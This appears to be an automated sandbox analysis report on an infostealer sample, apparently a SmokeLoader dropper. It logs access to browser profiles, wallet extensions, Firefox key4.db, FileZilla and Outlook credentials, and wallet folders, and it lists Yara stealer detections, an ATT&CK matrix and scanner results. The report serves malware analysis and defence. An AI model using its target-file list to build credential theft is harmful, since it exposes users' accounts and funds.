Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\\key4.db
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\A203.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\A203.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\A203.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\System32\dialer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Windows\System32\dialer.exe	Directory queried: C:\Users\Default\Documents
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS

Source: Yara match	File source: 00000024.00000002.2623549730.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2797802024.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2674601297.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5A58.exe PID: 7380, type: MEMORYSTR

Remote Access Functionality

Yara detected Glupteba

Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.2dd0e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.31839b57a4f11171d6abc8bbc4451ee4.exe.36c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31839b57a4f11171d6abc8bbc4451ee4.exe PID: 6508, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 564, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 5A58.exe PID: 7380, type: MEMORYSTR

Yara detected Petite Virus

Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-OI81K.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-7DQAC.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PTF13.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-62HR3.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L2GUL.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-ER2T6.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-KOPPR.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TFV9B.tmp, type: DROPPED

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000022.00000003.2177329422.000001B8F3EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2218763067.000000001BD11000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 38.0.A203.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.907.exe.4d3b620.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.907.exe.4d047f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.907.exe.4d047f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.907.exe.4d3b620.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000000.2233055154.0000000000482000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3177470933.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2623549730.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1919407201.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1919407201.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2657468716.0000000002884000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1919407201.0000000004D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6840, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\A203.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: W73PCbSH71.exe, type: SAMPLE
Source: Yara match	File source: 3.0.jfhrjta.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.toolspub2.exe.5515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jfhrjta.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.W73PCbSH71.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.W73PCbSH71.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1687909281.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1925341423.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1925621429.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2100813510.00000000004A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1688011276.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2100651927.0000000000470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\jfhrjta, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000003.2191639090.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected zgRAT

Source: Yara match	File source: 36.2.7D14.exe.330000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.907.exe.c30000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\907.exe

Code function: 6_2_6F88A0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,

6_2_6F88A0C0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	Exfiltration Over Other Network Medium	13 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 System Shutdown/Reboot	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	14 Native API	221 Registry Run Keys / Startup Folder	1 Abuse Elevation Control Mechanism	111 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	Exfiltration Over Bluetooth	21 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	1 Shared Modules	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	14 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	1 Exploitation for Client Execution	Login Hook	1 Access Token Manipulation	3 Obfuscated Files or Information	NTDS	179 System Information Discovery	Distributed Component Object Model	21 Input Capture	Traffic Duplication	4 Non-Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	2 Command and Scripting Interpreter	Network Logon Script	813 Process Injection	23 Software Packing	LSA Secrets	1 Query Registry	SSH	2 Clipboard Data	Scheduled Transfer	125 Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	1 PowerShell	RC Scripts	221 Registry Run Keys / Startup Folder	1 Timestomp	Cached Domain Credentials	1071 Security Software Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	1 Proxy			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	661 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	32 Masquerading	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	661 Virtualization/Sandbox Evasion	Network Sniffing	3 System Owner/User Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses
Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Exfiltration Over Unencrypted Non-C2 Protocol	Mail Protocols			Firmware Corruption	Domains	Network Security Appliances
Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	813 Process Injection	Keylogging	11 System Network Configuration Discovery	Taint Shared Content	Screen Capture	Exfiltration Over Physical Medium	DNS			Resource Hijacking	DNS Server	Gather Victim Org Information
Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Files and Directories	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Exfiltration over USB	Proxy			Network Denial of Service	Virtual Private Server	Determine Physical Locations

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
W73PCbSH71.exe	78%	ReversingLabs	Win32.Trojan.SmokeLoader
W73PCbSH71.exe	82%	Virustotal		Browse
W73PCbSH71.exe	100%	Avira	TR/Crypt.XPACK.Gen
W73PCbSH71.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\ClocX\ClocX.exe	5%	ReversingLabs
C:\Program Files (x86)\ClocX\uninst.exe	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\7z.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\OptimFROG.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bass.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_aac.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_fx.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_ofr.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_tta.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassalac.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassape.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\basscd.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassdsd.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassflac.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmidi.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmix.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassopus.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\basswma.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\basswv.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\d_writer.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\da.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\daiso.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2pcmt.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\dstt.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\ff_helper.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\gain_analysis.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-01JPP.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-0MOHV.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-28DPF.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-338K7.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-57NTO.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-62HR3.tmp	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-6USPQ.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-7DFBO.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-7DQAC.tmp	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-8S45S.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-9EPE2.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-9PQ68.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-AKKJ0.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-AR2HV.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-DEI4I.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-ER2T6.tmp	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-FP4S7.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-HPIH3.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-I6VL6.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-IE3LC.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-IE8CS.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-J8ET1.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-JRUFU.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-KGUCQ.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-KMJ34.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-KOPPR.tmp	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L2GUL.tmp	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-M2T3E.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MEVM4.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MRQQI.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MSLFL.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MTV1E.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MVB0G.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-N7BK8.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-OEQUH.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-OI81K.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PTF13.tmp	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-QDL6V.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-QLQ4O.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-RV73J.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TCA78.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TFV9B.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TIUE0.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-V58DU.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-VFKEO.tmp	0%	ReversingLabs
